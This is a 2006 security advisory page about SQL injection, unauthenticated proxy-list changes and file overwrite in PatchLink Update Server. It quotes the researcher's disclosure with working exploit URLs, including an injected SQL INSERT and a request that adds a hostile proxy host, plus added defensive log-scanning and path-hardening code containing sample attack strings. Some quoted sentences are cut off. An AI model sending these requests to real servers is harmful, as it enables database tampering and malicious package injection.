SecurityTracker.com
Category:   Application (Security)  >   PatchLink Update
Vendors:   PatchLink Corporation
PatchLink Update Bugs Let Remote Users Inject SQL Commands, Modify the Configuration, and Create or Overwrite Files
SecurityTracker Alert ID:  1016405
SecurityTracker URL:  http://securitytracker.com/id/1016405
CVE Reference:   CVE-2006-3425, CVE-2006-3426, CVE-2006-3430
Updated:  Aug 12 2008
Original Entry Date:  Jun 29 2006
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 6.1, 6.2.0.181, 6.2.0.189
Description:   Several vulnerabilities were reported in PatchLink Update Server (PLUS). A remote user can inject SQL commands. A remote user may be able to inject packages into the PatchLink environment. A remote user can create or overwrite files on the target system.

The 'checkprofile.asp' script does not properly validate user-supplied input in the 'agentid' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. The SQL commands will run with 'PLUS ANONYMOUS' user privileges, where this user is part of the PLUS ADMINS database operator group.

The 'proxyreg.asp' script does not properly authenticate remote users. A remote user can invoke the script to list, add, and delete PatchLink Distribution Point (PDP) servers. A remote user can exploit this to proxy requests by a target PatchLink Update Agent for patches, which may allow the remote user to inject arbitrary packages into the PatchLink environment. Only the FastPatch product is affected. Systems that use SSL to encrypt agent-to-PLUS communications are not affected.

The 'nwupload.asp' script does not properly authenticate remote users. A remote user can create or overwrite files on the target system.

Novell ZENworks Patch Management 6.2 SR1 is also affected by these vulnerabilities.
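
One way to review web server logs for requests to the three scripts described above, added here as an example (it is not part of the advisory or of any vendor tooling). The log field order, the agent-ID character set, and the `known_pdp_ips` allowlist are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs

# Assumption: legitimate agent IDs are alphanumeric/GUID-like; tune to your fleet.
AGENTID_OK = re.compile(r"[A-Za-z0-9{}-]+")
PATH_CHARS = re.compile(r"\.\.|[\\/:]")

def classify(uri_stem, uri_query):
    """Return findings for one request to the /dagent/ scripts named above."""
    script = uri_stem.lower().rsplit("/", 1)[-1]
    params = {k.lower(): v[0] for k, v in
              parse_qs(uri_query, keep_blank_values=True).items()}
    findings = []
    if script == "checkprofile.asp":
        agentid = params.get("agentid", "")
        if agentid and not AGENTID_OK.fullmatch(agentid):
            findings.append("checkprofile.asp: unexpected characters in agentid")
    elif script == "proxyreg.asp":
        # Assumption: listing is routine; additions/deletions redirect agents, so report each.
        for action in ("proxy", "delete"):
            if action in params:
                findings.append(f"proxyreg.asp: PDP list change ({action}={params[action]})")
    elif script == "nwupload.asp":
        for name in ("action", "agentid", "index"):
            if PATH_CHARS.search(params.get(name, "")):
                findings.append(f"nwupload.asp: path characters in {name}")
    return findings

def scan(log_text, known_pdp_ips=frozenset()):
    """Return (client_ip, finding) pairs; PDP changes from known PDP hosts are skipped."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()  # date time c-ip cs-method cs-uri-stem cs-uri-query ...
        for finding in classify(fields[4], fields[5]):
            if not (finding.startswith("proxyreg") and fields[2] in known_pdp_ips):
                hits.append((fields[2], finding))
    return hits

# Constructed sample lines (assumed order: date time c-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
2006-06-29 10:00:01 10.0.0.5 GET /dagent/checkprofile.asp agentid=4F2A-88 200
2006-06-29 10:00:07 10.0.0.9 GET /dagent/checkprofile.asp agentid=11111'-- 200
2006-06-29 10:01:12 10.0.0.9 GET /dagent/proxyreg.asp List= 200
2006-06-29 10:01:30 10.0.0.9 GET /dagent/proxyreg.asp Proxy=pdp9.example.net:8080 200
2006-06-29 10:01:45 10.0.0.20 GET /dagent/proxyreg.asp Proxy=pdp1.example.net:8080 200
2006-06-29 10:02:02 10.0.0.9 GET /dagent/nwupload.asp action=..%5C..&agentid=two&data=x&index=1 200
"""
```

Calling `scan(SAMPLE_LOG, known_pdp_ips={"10.0.0.20"})` reports the three requests from 10.0.0.9 and skips the PDP change made from the allowlisted host.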

Chris Steipp of Novacoast discovered these vulnerabilities.

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user may be able to inject packages into the PatchLink environment.

A remote user can create or overwrite files on the target system.

Solution:   The vendor has issued the following patches.

PatchLink Update Server (PLUS) for 6.1 P1

PatchLink Update Server (PLUS) for 6.2 SR1 P1

Vendor URL:  www.patchlink.com/
Cause:   Authentication error, Input validation error
Underlying OS:  Windows (2000), Windows (2003)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Multiple Vulnerabilities in PatchLink Update


-------------------------------------------------------------
PatchLink Update Server 6 SQL Injection
-------------------------------------------------------------
Severity: Critical
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------

Synopsis
=====
Novacoast has discovered a vulnerability in the PatchLink Update Server
(PLUS). This could allow the attacker to execute SQL statements in the
PatchLink database as DBO.

Background
======

PatchLink Update* is the core product of the leading patch and
vulnerability management solution for medium and large enterprise
networks.

Discussion
======

There is an SQL injection vulnerability in the checkprofile.asp script.
This unauthenticated script uses posted variables in an SQL call, which
can be exploited.

An unchecked, posted variable (agentid) is used to create an SQL
statement.
ADMINS, and the PLUS ADMINS group is dbo on the PLUS database) was the
inserting user.
Thus the database can be manipulated as DBO via this attack.

Affected Version
=========

PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1

Exploit
====

None required.

into the ReportErrors table:

   
http://plus.company.org/dagent/checkprofile.asp?agentid=11111';%20INSERT
    %20INTO%20ReportErrors%20(ReportError_Description)%20VALUES%20
   ('something')--

Recommended Solution
=============

Apply Vendor Patch
    PatchLink:
        PatchLink Update Server (PLUS) for 6.2 SR1 P1
        PatchLink Update Server (PLUS) for 6.1 P1
    Novell:
        http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm

Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.




-------------------------------------------------------------
PatchLink Update Server 6 PDP Anonymous Access
-------------------------------------------------------------
Severity: Medium
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------

Synopsis
=====

Novacoast has discovered a vulnerability in the PatchLink Update Server
(PLUS) Distribution Point Server Listing for PatchLink's FastPatch
application. Exploitation of this vulnerability could allow the attacker
to proxy requests by PatchLink Update Agents for patches, and thus
possibly inject arbitrary packages into the PatchLink environment.

Background
======

PatchLink Update* is the core product of the leading patch and
vulnerability management solution for medium and large enterprise
networks.

PatchLink Distribution Point and FastPatch technology provide
intelligent distribution across the entire enterprise minimizing
deployment speeds and bandwidth utilization across the wide area
network.

Discussion
======

credentials when
PatchLink FastPatch software, which allows roaming PatchLink agents to
identify proxy servers on their network and connect to the closest or
fastest PatchLink Distribution Point (PDP) automatically. The asp page
returns a list of PDP servers in the organization's environment. An
unauthenticated user can list, add, and remove PDP servers from this
list.

This vulnerability would only affect organizations that use the
FastPatch add-on product. Organizations that use SSL to protect their
agent-to-PLUS communication will be unaffected by this attack.

Affected Version
=========

PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1

Exploit
====

None required.

1) To list all Proxy servers use:

    http://plus.company.org/dagent/proxyreg.asp?List=

    Use username/password of null/null for authentication.

2) To add a new Proxy server, use:

    http://plus.company.org/dagent/proxyreg.asp?Proxy=www.hostileproxy.com:1337

3) To delete a Proxy server, use:

    http://plus.company.org/dagent/proxyreg.asp?Delete=pdp1.company.org


Recommended Solution
=============

1) Apply Vendor Patch
    PatchLink:
        PatchLink Update Server (PLUS) for 6.2 SR1 P1
        PatchLink Update Server (PLUS) for 6.1 P1
    Novell:
        http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm

2) Workaround
    Deploy SSL certificate authentication to secure traffic between
    agents and PLUS.






-------------------------------------------------------------
PatchLink Update Server 6 File Overwrite
-------------------------------------------------------------
Severity: Medium
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------

Synopsis
=====
Novacoast has discovered a vulnerability in the PatchLink Update Server
(PLUS). This could allow the attacker to write or overwrite files on the
PLUS filesystem.

Background
======

PatchLink Update* is the core product of the leading patch and
vulnerability management solution for medium and large enterprise
networks.

Discussion
======

and
(who is a member of "PLUS ADMINS" Windows group by default).  No
validation checks are performed to prevent directory traversal.

The application nwupload.asp writes a file into directories defined by
variables passed to the page, appended to a registry key value. By
default, on a Windows 2003 server, the registry key points to:
directory traversals are not checked for, it is possible to write to any
folder on the PLUS that PLUS ANONYMOUS (or thus, the PLUS ADMINS group)
has access to.

Affected Version
=========

PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1

Exploit
====

None required.

1) An attacker can run:
   
http://plus.company.org/dagent/nwupload.asp?action=one&agentid=two&data=
    thisiscool&index=1

This will first delete the folder at:
    {regkey for storage directory}\one\two

then create the directory:
     {regkey for storage directory}\one\two

then write the file:
    {regkey for storage directory}\one\two\1.txt

The file 1.txt will have the contents of the "data" variable.

Recommended Solution
=============

Apply Vendor Patch
    PatchLink:
        PatchLink Update Server (PLUS) for 6.2 SR1 P1
        PatchLink Update Server (PLUS) for 6.1 P1
    Novell:
        http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
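
The file-overwrite report above says nwupload.asp appends request values to a storage directory without checking for directory traversal. The following added example (not code from the advisory, PatchLink, or Novell) puts that path construction beside a hardened version. `STORAGE_ROOT`, the function names, and the allowed character set are assumptions, and the traversal value is constructed.

```python
import ntpath  # Windows path rules, usable on any OS
import re

# Hypothetical stand-in for the registry value; the page does not give the real path.
STORAGE_ROOT = r"C:\PLUS\Storage"
NAME_OK = re.compile(r"[A-Za-z0-9_-]{1,64}")
RESERVED = re.compile(r"(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])", re.I)  # DOS device names

def naive_path(root, action, agentid, index):
    """Path as the advisory describes it: request values appended to the root."""
    return ntpath.normpath(ntpath.join(root, action, agentid, index + ".txt"))

def safe_path(root, action, agentid, index):
    """Same layout, but every component must be a plain name inside the root."""
    for name, value in (("action", action), ("agentid", agentid)):
        if not NAME_OK.fullmatch(value) or RESERVED.fullmatch(value):
            raise ValueError(f"rejected {name}: {value!r}")
    if not re.fullmatch(r"[0-9]{1,6}", index):
        raise ValueError(f"rejected index: {index!r}")
    full = ntpath.normpath(ntpath.join(root, action, agentid, index + ".txt"))
    # Defence in depth: confirm the result is still under the storage root,
    # since the same components also name the folder that is deleted and recreated.
    root_norm = ntpath.normcase(ntpath.normpath(root))
    if ntpath.commonpath([root_norm, ntpath.normcase(full)]) != root_norm:
        raise ValueError("path escapes storage root")
    return full

def demo():
    """Return (naive result, hardened result) for a constructed traversal value."""
    args = ("..\\..", "other", "1")
    try:
        hardened = safe_path(STORAGE_ROOT, *args)
    except ValueError as exc:
        hardened = f"blocked: {exc}"
    return naive_path(STORAGE_ROOT, *args), hardened
```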

 
 

